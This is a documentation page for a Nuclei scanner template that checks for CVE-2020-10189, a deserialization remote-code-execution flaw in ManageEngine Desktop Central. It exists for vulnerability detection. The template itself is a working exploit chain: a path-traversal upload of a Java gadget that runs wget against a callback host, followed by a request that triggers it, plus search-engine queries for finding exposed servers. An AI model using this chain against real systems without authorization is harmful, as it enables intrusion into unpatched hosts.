ManageEngine Desktop Central Java Deserialization
ID: CVE-2020-10189
Severity: critical
Author: king-alexander
Tags: cve,cve2020,kev,zoho,manageengine,deserialization,intrusive
Description
Section titled “Description”Zoho ManageEngine Desktop Central before 10.0.474 is vulnerable to a deserialization of untrusted data, which permits remote code execution.
YAML Source
Section titled “YAML Source”id: CVE-2020-10189
info: name: ManageEngine Desktop Central Java Deserialization author: king-alexander severity: critical description: | Zoho ManageEngine Desktop Central before 10.0.474 is vulnerable to a deserialization of untrusted data, which permits remote code execution. remediation: | Apply updates per vendor instructions. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-10189 - https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189 - https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html - https://y4er.com/posts/cve-2020-10189-zoho-manageengine-rce/ - https://cwe.mitre.org/data/definitions/502.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-10189 cwe-id: CWE-502 epss-score: 0.97206 epss-percentile: 0.99826 cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: zohocorp product: manageengine_desktop_central fofa-query: - body="manageengine desktop central 10" - title="manageengine desktop central 10" - app="zoho-manageengine-desktop" shodan-query: http.title:"manageengine desktop central 10" google-query: intitle:"manageengine desktop central 10" tags: cve,cve2020,kev,zoho,manageengine,deserialization,intrusive
flow: http(1) && http(2)
http: - raw: - | POST /mdm/client/v1/mdmLogUploader?udid=si%5C..%5C..%5C..%5Cwebapps%5CDesktopCentral%5C_chart&filename=logger.zip HTTP/1.1 Host: {{Hostname}} Content-Type: application/octet-stream
{{generate_java_gadget("commons-collections3.1","wget http://{{interactsh-url}}","raw")}}
matchers: - type: status status: - 200 internal: true
- raw: - | GET /cewolf/?img=%5Clogger.zip HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns"
- type: status status: - 200# digest: 4a0a0047304502201c2d0c246170448d0c9b2110e4599f16b0470c4b78d027bd2858d6a13c35bbfb0221009f2507f24dfafc235a346358c0de5dbeaa756c52f62e92e76d16ba68a761b9bd:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-10189.yaml"